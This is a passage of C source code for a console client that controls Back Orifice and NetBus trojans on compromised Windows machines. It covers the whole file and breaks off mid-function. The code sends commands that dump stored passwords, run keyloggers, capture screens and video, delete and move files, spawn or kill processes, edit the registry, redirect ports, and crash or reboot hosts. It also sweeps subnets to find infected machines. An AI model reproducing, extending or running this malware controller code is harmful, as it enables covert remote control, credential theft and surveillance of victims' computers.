
#include "bounix.h"

extern int udpsock;
extern int port;
extern in_addr_t host;
extern char cwd[MAX_PATH];
extern char g_password[ARGSIZE];

int trojanmode = TROJAN_BO;
struct in_addr hostin;
struct hostent *hptr;

/* Netbus */

int nbconnected = 0;		/* Is client connected? */
char nbserver[256];

int nbsock, nbport, nbread;
struct hostent *nbhost;
struct sockaddr_in nbremote;
unsigned char nbstring[NBBUF_LEN];
fd_set nbfdset;

char netbusresponses[NETBUSMAXCOM][2][40] =
{
	{"Info;", "Info received"},
	{"Answer;", "User answered"},
	{"Msg;", "Message answer"},
	{"Key;", "Key press received"}
};

char unknownnbresponse[] = "Unknown response";

void strreplace(char *str, char *s1, char *s2, unsigned size)
{
	char *c, *c2, tmp[1024];

	if (str == NULL)
		return;
	if (size > sizeof(tmp))
		size = sizeof(tmp);
	c = str;
	do {
		memset(tmp, 0, sizeof(tmp));
		c = ((c != NULL) ? (strstr(c, s1)) : (NULL));
		if (c == NULL)
			continue;
		if ((c != str) && ((*(c - 1)) == '\\')) {
			c2 = c;
			while ((*c) != '\0') {
				(*(c - 1)) = (*c);
				c++;
			}
			(*(c - 1)) = '\0';
			/* c += ((strlen(s1) < strlen(c)) ? (strlen(s1)) : (size)); */
			c = c2;
			continue;
		}
		c2 = c;
		if ((strlen(c) - strlen(s1)) < sizeof(tmp)) {
			memcpy(tmp, c + strlen(s1), strlen(c) - strlen(s1));
			if ((c + strlen(s2)) < (str + size)) {
				memcpy(c, s2, strlen(s2));
				c += strlen(s2);
				if (strlen(tmp) < (size - (c - str))) {
					memcpy(c, tmp, strlen(tmp));
					c += strlen(tmp);
					if ((c - str) < size)
						(*c) = '\0';
				}
			}
		}
		c = c2;
	}
	while (c != NULL);
}

void nbrecognizecommand(char *nbmsg, int size, char **what, char **info)
{
	int i = 0, j;

	while ((nbmsg[i] != '\0') && (nbmsg[i] != ';') && (i < size))
		i++;

	if (i < size)
		if (nbmsg[i] == ';') {
			for (j = 0; j < NETBUSMAXCOM; j++) {
				if (strncmp(nbmsg, netbusresponses[j][0], strlen(netbusresponses[j][0]) - 1) == 0) {
					*what = netbusresponses[j][1];
					*info = &nbmsg[++i];
					return;
				}
			}
		}
	*what = unknownnbresponse;
	*info = nbmsg;
	return;
}


int init_netbus(char *server, int nbport)
{
	if (nbconnected == 0) {
		memset(nbstring, 0, NBBUF_LEN);
		FD_ZERO(&nbfdset);
		nbsock = socket(AF_INET, SOCK_STREAM, 0);
		if (nbsock < 0) {
			perror("socket");
			return (1);
		}
		nbhost = gethostbyname(server);
		if (nbhost == NULL) {
			perror("gethostbyname");
			return (1);
		}
		nbremote.sin_family = AF_INET;
		nbremote.sin_addr.s_addr = *(long *) (nbhost->h_addr);
		nbremote.sin_port = htons(nbport);

		if ((connect(nbsock, (struct sockaddr *) &nbremote, sizeof(nbremote))) < 0) {
			perror("connect");
			return (1);
		}
		nbconnected = 1;
		printf("Connected to %s\n", inet_ntoa(nbremote.sin_addr));
	} else {
		printf("Already connected\nClose Connection first\n");
	}
	return 0;
}


int close_netbus(void)
{
	if (nbconnected == 1) {
		if ((close(nbsock)) < 0) {
			perror("sock close");
			return (1);
		}
		nbconnected = 0;
		printf("Connection Closed\n");
	}
	return 0;
}

int send_netbus_command(char *command)
{
	if (nbconnected == 1) {
		return send(nbsock, command, strlen(command), 0);	/* NEED TO PUT DEFINE */
	}
	return -1;
}

int check_netbus_response(char *buf)
{
	struct timeval tv;

	if (nbconnected == 1) {
		FD_SET(nbsock, &nbfdset);
		tv.tv_sec = 0;
		tv.tv_usec = 500;
		if (select(nbsock + 1, &nbfdset, NULL, NULL, &tv) < 0) {
			if (errno != EINTR) {
				perror("select()");
				exit(1);
			}
		}
		if (FD_ISSET(nbsock, &nbfdset)) {
			nbread = recv(nbsock, nbstring, NBBUF_LEN, 0);	/* NEED TO PUT DEFINE */
			if (nbread < 0) {
				perror("Network read error");
				return (NB_NETWORK_ERROR);
			} else if (nbread == 0) {
				nbconnected = 0;
				return (NB_SERVER_DISCONNECTED);
			}
			strreplace(nbstring, "|", "\n", sizeof(nbstring));
			strreplace(nbstring, "\r", "\\r", sizeof(nbstring));
			strcpy(buf, nbstring);
			return (nbread);
/*
   memset (nbstring,0,sizeof(nbstring));
   printf ("===NETBUS SERVER RESPONSE BEGIN===\n");
   strreplace (nbstring,"|","\n",sizeof(nbstring));
   nbrecognizecommand (nbstring,nbread,&nbcom,&nbinfo);
   printf ("%s:\n",nbcom);
   printf ("%s\n",nbinfo);
   printf ("===NETBUS SERVER RESPONSE END===\n");
 */
		}
		return (NB_NO_DATA);
	}
	return (NB_NO_DATA);
}


int pingsweepsubnet(char *arg1, int udpsock, int port)
{
	char subnet[16];
	char ipaddr[16];
	char socks[255];
	int x, y;

	/* Find third octet and truncate */
	strncpy(subnet, arg1, 15);
	x = 0;
	while ((x < 15) && (subnet[x] != '.'))
		x++;
	x++;
	while ((x < 15) && (subnet[x] != '.'))
		x++;
	x++;
	while ((x < 15) && isdigit((int) subnet[x]))
		x++;
	subnet[x] = '\0';

	strcpy(ipaddr, subnet);
	strcat(ipaddr, ".255");
	if (inet_addr(ipaddr) == (unsigned long) -1) {
		printf("Bad IP subnet: '%s'\n", arg1);
		return (1);
	}
	printf("Sweeping subnet %s.*...\n", subnet);
	for (y = 0; y < 7; y++) {
		printf(" %s.%d -- %s.%d\n", subnet, (y * 32) + 1, subnet, (y * 32) + 32);
		for (x = 0; x < 32; x++) {
			sprintf(ipaddr, "%s.%d", subnet, x + 1 + (y * 32));
			socks[x] = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
			if (sendping(inet_addr(ipaddr), port, socks[x])) {
				printf("Sendping failed for dest %s\n", ipaddr);
			}
		}
		sleep(SWEEPDELAY);
		for (x = 0; x < 32; x++) {
			getpong(socks[x]);
			close(socks[x]);
		}
	}
	printf(" %s.225 -- %s.254\n", subnet, subnet);
	for (x = 225; x < 255; x++) {
		sprintf(ipaddr, "%s.%d", subnet, x);
		socks[x] = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
		if (sendping(inet_addr(ipaddr), port, socks[x])) {
			printf("Sendping failed for dest %s\n", ipaddr);
		}
	}
	sleep(SWEEPDELAY);
	for (x = 225; x < 255; x++) {
		getpong(socks[x]);
		close(socks[x]);
	}

	return (0);
}


static void build_commands(int type)
{
#define COLUMNS 4
	struct COMMAND *cmd;
	int i, j, k, max, first;

	cmd = get_commands();
	if (!cmd)
		return;
	max = 0;
	for (i = 0; cmd[i].cmd != (char *) NULL; i++) {
		if (cmd[i].type != type)
			continue;
		if (max < strlen(cmd[i].cmd))
			max = strlen(cmd[i].cmd);
	}
	/* max += 3; */
	j = 0;
	first = 1;
	for (i = 0; cmd[i].cmd != (char *) NULL; i++) {
		if (cmd[i].type != type)
			continue;
		if (j >= COLUMNS) {
			j = 0;
			printf("\n\t");
		}
		if (first != 0) {
			first = 0;
			printf("\t");
		}
		printf("%s", cmd[i].cmd);
		if (j < (COLUMNS - 1)) {
			for (k = 0; k < ((max - strlen(cmd[i].cmd)) / 8) + 1; k++)
				printf("\t");
		}
		j++;
	}
	if (j > 0)
		printf("\n");
#undef COLUMNS
}


void printhelp(void)
{
	struct IDX {
		char *desc;
		int type;
	};
	static struct IDX bo_idx[] =
	{
		{"BO commands (use `mode' to change mode)", CMD_BO_BASIC},
		{"File commands", CMD_BO_FILE},
		{"Directory commands", CMD_BO_DIR},
		{"System commands", CMD_BO_SYS},
		{"Network commands", CMD_BO_NET},
		{"Plugin commands", CMD_BO_PLUGIN},
		{"Process commands", CMD_BO_PROCESS},
		{"Registry commands", CMD_BO_REG},
		{"Multimedia commands", CMD_BO_MM},
		{"Redir commands", CMD_BO_REDIR},
		{"Console application commands", CMD_BO_CON},
		{(char *) NULL, CMD_NONE}
	};
	static struct IDX nb_idx[] =
	{
		{"NB commands (use `mode' to change mode)", CMD_NB_BASIC},
		{"Network commands", CMD_NB_NET},
		{"Multimedia commands", CMD_NB_MM},
		{"System commands", CMD_NB_SYS},
		{(char *) NULL, CMD_NONE}
	};
	struct IDX *idx;
	int j;

	idx = (struct IDX *) NULL;
	printf("\n");
	switch (trojanmode) {
	case TROJAN_BO:
		printf("Back Orifice Client v%s help: (Type `help command' for more help)\n", VERSION);
		idx = bo_idx;
		break;
	case TROJAN_NB:
		printf("NetBus Client v%s help: (Type `help command' for more help)\n", VERSION);
		idx = nb_idx;
		break;
	}
	if (!idx)
		return;
	for (j = 0; idx[j].desc != (char *) NULL; j++) {
		printf("%s:\n", idx[j].desc);
		build_commands(idx[j].type);
	}
}


/* Returns:
 *      -1:     hname == NULL
 *       0:     success
 *       1:     resolver error
 *       2:     bogus IP
 */
int new_host(char *hname, char *cport)
{
	int x;

	if (!hname)
		return (-1);

	/* Is it a hostname or a valid address? */
	if ((host = inet_addr(hname)) == (in_addr_t) - 1) {
		/* Ain't an address, assuming hostname */
		hptr = gethostbyname(hname);
		if (hptr == NULL) {
			host = 0;
			hostin.s_addr = host;
			return (1);
		}
		printf("official hostname: %s  address: %s\n",
		       hptr->h_name,
		    inet_ntoa(*(struct in_addr *) hptr->h_addr_list[0]));
		if ((host = *(in_addr_t *) hptr->h_addr_list[0]) == (in_addr_t) - 1) {
			host = 0;
			hostin.s_addr = host;
			printf("resolver returned bogus IP address!\n");
			return (1);
		}
	}
	if (cport) {
		if ((x = atoi(cport)))
			port = x;
	}
	hostin.s_addr = host;
	return (0);
}


/* Common commands */
int cmd_quit(char *arg1, char *arg2)
{
	arg1 = arg1;
	arg2 = arg2;
	switch (trojanmode) {
	case TROJAN_BO:
		close_netbus();
		close(udpsock);
		break;
	case TROJAN_NB:
		close(udpsock);
		break;
	}
	exit(0);
	return 0;		/* keep `-Wall' happy */
}

int cmd_mode(char *arg1, char *arg2)
{
	if (!strlen(arg1)) {
		printf("Must specify mode.\n");
		printf("\tBO (BackOrifice)\n");
		printf("\tNB (NetBus)\n");
		return -1;
	}
	if ((strncasecmp(arg1, "BO", strlen(arg1)) == 0) || (strncasecmp(arg1, "BACKORIFICE", strlen(arg1)) == 0)) {
		printf("Switched to BackOrifice mode\n");
		trojanmode = TROJAN_BO;
		return 0;
	}
	if ((strncasecmp(arg1, "NB", strlen(arg1)) == 0) || (strncasecmp(arg1, "NETBUS", strlen(arg1)) == 0)) {
		printf("Switched to NetBus mode\n");
		trojanmode = TROJAN_NB;
		return 0;
	}
	printf("Unknown mode: `%s'. Try `help mode'.\n", arg1);
	return -1;
}

int cmd_help(char *arg1, char *arg2)
{
	arg2 = arg2;
	if (!arg1 || !strlen(arg1))
		printhelp();
	else
		givehelpcommand(arg1);
	return 0;
}


/* BO commands */
int cmd_bo_host(char *arg1, char *arg2)
{
	if (!arg1 || !*arg1) {
		printf("Must specify hostname.\n");
		return 1;
	}
	switch (new_host(arg1, arg2)) {
	case 0:
		printf("New host: %s:%d\n", inet_ntoa(hostin), port);
		return 0;
	case 1:
		printf("resolver said: eat me.\n");
		return -1;
	case 2:
		printf("resolver returned bogus IP address!\n");
		return -2;
	}
	return 0;
}

int cmd_bo_ping(char *arg1, char *arg2)
{
	arg1 = arg1;
	arg2 = arg2;
	if (!sendpacket(TYPE_PING, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_status(char *arg1, char *arg2)
{
	hostin.s_addr = host;
	printf("Current Back Orifice Console Client status:\n Host: %s port %d\n",
	       inet_ntoa(hostin), port);
	printf(" Remote dir: %s\n", cwd);
	return 0;
}

int cmd_bo_dir(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];
	int x;

	if (arg1[0] == 0)
		sprintf(buff, "%s*", cwd);
	else {
		if (arg1[0] == '\\') {
			strncpy(buff, cwd, 3);
			strcpy(buff + 3, arg1);
		} else if (strncmp(arg1 + 1, ":\\", 2) == 0) {
			strcpy(buff, arg1);
		} else {
			strcpy(buff, cwd);
			strcat(buff, arg1);
		}
		x = strlen(buff);
		if (buff[x - 1] == '\\')
			strcat(buff, "*");
	}
#ifdef DEBUG
	printf("cwd:[%s] %d buff:[%s] %d arg1:[%s] %d\n", cwd, strlen(cwd), buff, strlen(buff), arg1, strlen(arg1));
#endif
	if (!sendpacket(TYPE_DIRECTORYLIST, buff, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_cd(char *arg1, char *arg2)
{
	int x;

	if (arg1[0] == 0) {
		puts("Must supply directory name");
		return (1);
	}
	strcpy(cwd, arg1);
	x = strlen(cwd);
	if (cwd[x - 1] != '\\')
		strcat(cwd, "\\");
	printf("New directory on host is %s\n", cwd);
	return 0;
}

int cmd_bo_del(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];

	if (arg1[0] == 0) {
		puts("Must supply filename");
		return (1);
	}
	fixfilename(buff, cwd, arg1);
	if (!sendpacket(TYPE_FILEDELETE, buff, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_copy(char *arg1, char *arg2)
{
	char buff[BUFFSIZE], buff2[BUFFSIZE], *ptr;

	if (arg1[0] == 0) {
		puts("Must supply filename");
		return (1);
	}
	fixfilename(buff, cwd, arg1);
	if (arg2[0] == 0) {
		ptr = strrchr(buff, '\\');
		ptr++;
		sprintf(buff2, "%s%s", cwd, ptr);
	} else {
		fixfilename(buff2, cwd, arg2);
	}
	if (!sendpacket(TYPE_FILECOPY, buff, buff2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_find(char *arg1, char *arg2)
{
	if ((arg1[0] == 0) || (arg2[0] == 0)) {
		puts("Must supply file & pathname");
		return (1);
	}
	if (!sendpacket(TYPE_FILEFIND, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_freeze(char *arg1, char *arg2)
{
	char buff[BUFFSIZE], buff2[BUFFSIZE];

	if (arg1[0] == 0 || arg2[0] == 0) {
		puts("Must supply source and destination filenames");
		return (1);
	}
	fixfilename(buff, cwd, arg1);
	fixfilename(buff2, cwd, arg2);
	if (!sendpacket(TYPE_FILEFREEZE, buff, buff2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_melt(char *arg1, char *arg2)
{
	char buff[BUFFSIZE], buff2[BUFFSIZE];

	if (arg1[0] == 0 || arg2[0] == 0) {
		puts("Must supply source and destination filenames");
		return (1);
	}
	fixfilename(buff, cwd, arg1);
	fixfilename(buff2, cwd, arg2);
	if (!sendpacket(TYPE_FILEMELT, buff, buff2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_view(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];

	if (arg1[0] == 0) {
		puts("Must supply filename");
		return (1);
	}
	fixfilename(buff, cwd, arg1);
	if (!sendpacket(TYPE_FILEVIEW, buff, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_md(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];

	if (arg1[0] == 0) {
		puts("Must supply directory name");
		return (1);
	}
	fixfilename(buff, cwd, arg1);
	if (!sendpacket(TYPE_DIRECTORYMAKE, buff, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_rd(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];

	if (arg1[0] == 0) {
		puts("Must supply directory name");
		return (1);
	}
	fixfilename(buff, cwd, arg1);
	if (!sendpacket(TYPE_DIRECTORYDELETE, buff, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_info(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_SYSINFO, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_passes(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_SYSLISTPASSWORDS, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_dialog(char *arg1, char *arg2)
{
	if ((arg1[0] == 0) || (arg2[0] == 0)) {
		puts("Must supply dialog box text and title");
		return (1);
	}
	if (!sendpacket(TYPE_SYSDIALOGBOX, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_netview(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_NETVIEW, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_netlist(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_NETCONNECTIONS, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_netconnect(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply resource name");
		return (1);
	}
	if (!sendpacket(TYPE_NETUSE, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_netdisconnect(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply resource name");
		return (1);
	}
	if (!sendpacket(TYPE_NETDELETE, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_proclist(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_PROCESSLIST, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_prockill(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_PROCESSKILL, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_procspawn(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];

	if (arg1[0] == 0) {
		puts("Must supply at least application name");
		return (1);
	}
	sprintf(buff, "%s %s", arg1, arg2);
	if (!sendpacket(TYPE_PROCESSSPAWN, buff, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_passwd(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		g_password[0] = 0;
		printf("Password removed.\n");
	} else {
		strcpy(g_password, arg1);
		printf("New encryption password set to '%s'\n", g_password);
	}
	return 0;
}

int cmd_bo_ren(char *arg1, char *arg2)
{
	char buff[BUFFSIZE], buff2[BUFFSIZE], *ptr;

	if (arg1[0] == 0) {
		puts("Must supply filename");
		return (1);
	} else {
		fixfilename(buff, cwd, arg1);
		if (arg2[0] == 0) {
			ptr = strrchr(buff, '\\');
			ptr++;
			sprintf(buff2, "%s%s", cwd, ptr);
		} else {
			fixfilename(buff2, cwd, arg2);
		}
		if (!sendpacket(TYPE_FILERENAME, buff, buff2, host, port, udpsock))
			return (getinput(udpsock));
		else
			return (1);
	}
}

int cmd_bo_resolve(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply hostname");
		return (1);
	}
	if (!sendpacket(TYPE_RESOLVEHOST, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_sharelist(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_NETEXPORTLIST, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_shareadd(char *arg1, char *arg2)
{
	if (arg1[0] == 0 || arg2[0] == 0) {
		puts("Must supply share name and path");
		return (1);
	}
	if (!sendpacket(TYPE_NETEXPORTADD, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_sharedel(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply share name");
		return (1);
	}
	if (!sendpacket(TYPE_NETEXPORTDELETE, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_keylog(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply log filename");
		return (1);
	}
	if (strcasecmp(arg1, "STOP") == 0) {
		if (!sendpacket(TYPE_SYSENDKEYLOG, "", "", host, port, udpsock))
			return (getinput(udpsock));
		else
			return (1);
	} else {
		if (!sendpacket(TYPE_SYSLOGKEYS, arg1, "", host, port, udpsock))
			return (getinput(udpsock));
		else
			return (1);
	}
}

int cmd_bo_regmakekey(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply key name");
		return (1);
	}
	if (!sendpacket(TYPE_REGISTRYCREATEKEY, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_regdelkey(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply key name");
		return (1);
	}
	if (!sendpacket(TYPE_REGISTRYDELETEKEY, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_regdelval(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply value name");
		return (1);
	}
	if (!sendpacket(TYPE_REGISTRYDELETEVALUE, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_reglistkeys(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply key name");
		return (1);
	}
	if (!sendpacket(TYPE_REGISTRYENUMKEYS, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_reglistvals(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply key name");
		return (1);
	}
	if (!sendpacket(TYPE_REGISTRYENUMVALS, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_regsetval(char *arg1, char *arg2)
{
	if (arg1[0] == 0 || arg2[0] == 0) {
		puts("Must supply value name and data");
		return (1);
	}
	if (!sendpacket(TYPE_REGISTRYSETVALUE, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_listcaps(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_MMLISTCAPS, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_capframe(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply bitmap filename");
		return (1);
	}
	if (!sendpacket(TYPE_MMCAPFRAME, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_capavi(char *arg1, char *arg2)
{
	if (arg1[0] == 0 || atoi(arg2) == 0) {
		puts("Must supply avi filename and number of seconds");
		return (1);
	}
	if (!sendpacket(TYPE_MMCAPAVI, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_capscreen(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply bitmap filename");
		return (1);
	}
	if (!sendpacket(TYPE_MMCAPSCREEN, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_sound(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply wav filename");
		return (1);
	}
	if (!sendpacket(TYPE_MMPLAYSOUND, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_redirlist(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_REDIRLIST, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_rediradd(char *arg1, char *arg2)
{
	if (arg1[0] == 0 || arg2[0] == 0) {
		puts("Must supply input port and destination IP");
		return (1);
	}
	if (!sendpacket(TYPE_REDIRADD, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_redirdel(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply redir id");
		return (1);
	}
	if (!sendpacket(TYPE_REDIRDEL, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_applist(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_APPLIST, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_appadd(char *arg1, char *arg2)
{
	if (arg1[0] == 0 || arg2[0] == 0) {
		puts("Must supply exe name and input port");
		return (1);
	}
	if (!sendpacket(TYPE_APPADD, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_appdel(char *arg1, char *arg2)
{
	if (arg1[0] == 0) {
		puts("Must supply app id");
		return (1);
	}
	if (!sendpacket(TYPE_APPDEL, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_httpon(char *arg1, char *arg2)
{
	if (atoi(arg1) == 0) {
		puts("Must supply port");
		return (1);
	}
	if (!sendpacket(TYPE_HTTPENABLE, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_httpoff(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_HTTPDISABLE, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_sweep(char *arg1, char *arg2)
{
	if (!strlen(arg1)) {
		puts("Must supply subnet");
		return (1);
	}
	return (pingsweepsubnet(arg1, udpsock, port));
}

int cmd_bo_sweeplist(char *arg1, char *arg2)
{
	FILE *file;
	char buff[BUFFSIZE];

	if (!strlen(arg1)) {
		puts("Must supply list filename");
		return (1);
	}
	if ((file = fopen(arg1, "rt")) == NULL) {
		perror("fopen");
		return (1);
	}
	while (fgets(buff, BUFFSIZE, file) != NULL) {
		if (buff[strlen(buff) - 1] == '\n')
			buff[strlen(buff) - 1] = '\0';
		if (pingsweepsubnet(buff, udpsock, port))
			printf("Sweep of %s failed\n", buff);
	}
	if (fclose(file) == EOF) {
		perror("fclose");
		return (1);
	}
	printf("Full sweep ended.\n");
	return (0);
}

int cmd_bo_pinglist(char *arg1, char *arg2)
{
	FILE *file;
	char buff[BUFFSIZE];
	in_addr_t dest;

	if (!strlen(arg1)) {
		puts("Must supply list filename");
		return (1);
	}
	if ((file = fopen(arg1, "rt")) == NULL) {
		perror("fopen");
		return (1);
	}
	while (fgets(buff, BUFFSIZE, file) != NULL) {
		if (buff[strlen(buff) - 1] == '\n')
			buff[strlen(buff) - 1] = '\0';
		if ((dest = inet_addr(buff)) == (unsigned long) -1)
			printf("Bad IP: '%s'\n", buff);
		else {
			int s;
			hostin.s_addr = dest;
			printf("Pinging %s\n", inet_ntoa(hostin));
			s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
			if (sendping(dest, port, s)) {
				printf("Sendping failed for dest %s\n", inet_ntoa(hostin));
				continue;
			}
			sleep(SWEEPDELAY);
			getpong(s);
			close(s);
		}
	}
	if (fclose(file) == EOF) {
		perror("fclose");
		return (1);
	}
	printf("Pinging ended.\n");
	return (0);
}

int cmd_bo_reboot(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_SYSREBOOT, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_tcpsend(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_TCPFILESEND, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_tcprecv(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_TCPFILERECEIVE, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_lockup(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_SYSLOCKUP, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_pluginexec(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_PLUGINEXECUTE, arg1, arg2, host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_pluginkill(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_PLUGINKILL, arg1, "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}

int cmd_bo_pluginlist(char *arg1, char *arg2)
{
	if (!sendpacket(TYPE_PLUGINLIST, "", "", host, port, udpsock))
		return (getinput(udpsock));
	else
		return (1);
}


/* NB commands */
int cmd_nb_host(char *arg1, char *arg2)
{
	if (!strlen(arg1)) {
		printf("Specify a host to connect to!\n");
	} else {
		if (!strlen(arg2)) {
			init_netbus(arg1, NB_PORT);
		} else {
			init_netbus(arg1, atoi(arg2));
		}
	}
	return 0;
}

int cmd_nb_close(char *arg1, char *arg2)
{
	close_netbus();
	return 0;
}

int cmd_nb_info(char *arg1, char *arg2)
{
	send_netbus_command("GetInfo;\r\n");
	return 0;
}

int cmd_nb_listen(char *arg1, char *arg2)
{
	if (strncasecmp(arg1, "ON", strlen(arg1)) == 0) {
		send_netbus_command("Listen;1;\r\n");
		return 0;
	}
	if (strncasecmp(arg1, "OFF", strlen(arg1)) == 0) {
		send_netbus_command("Listen;0;\r\n");
		return 0;
	}
	printf("Unknown mode for `listen': `%s'\n", arg1);
	return 1;
}

int cmd_nb_cdeject(char *arg1, char *arg2)
{
	send_netbus_command("Eject;1;\r\n");
	return 0;
}

int cmd_nb_cdclose(char *arg1, char *arg2)
{
	send_netbus_command("Eject;0;\r\n");
	return 0;
}

int cmd_nb_swapbuttons(char *arg1, char *arg2)
{
	if (strncasecmp(arg1, "ON", strlen(arg1)) == 0) {
		send_netbus_command("SwapButton;1;\r\n");
		return 0;
	}
	if (strncasecmp(arg1, "OFF", strlen(arg1)) == 0) {
		send_netbus_command("SwapButton;0;\r\n");
		return 0;
	}
	printf("Unknown mode for `swapbuttons': `%s'\n", arg1);
	return 1;
}

int cmd_nb_send(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];

	if (!strlen(arg1)) {
		printf("Please specify RAW command to send\n");
		return 1;
	}
	sprintf(buff, "%s\r\n", arg1);
	send_netbus_command(buff);
	return 0;
}

int cmd_nb_url(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];

	if (!strlen(arg1)) {
		printf("Please specify URL to go to\n");
		return 1;
	}
	sprintf(buff, "URL;%s;\r\n", arg1);
	send_netbus_command(buff);
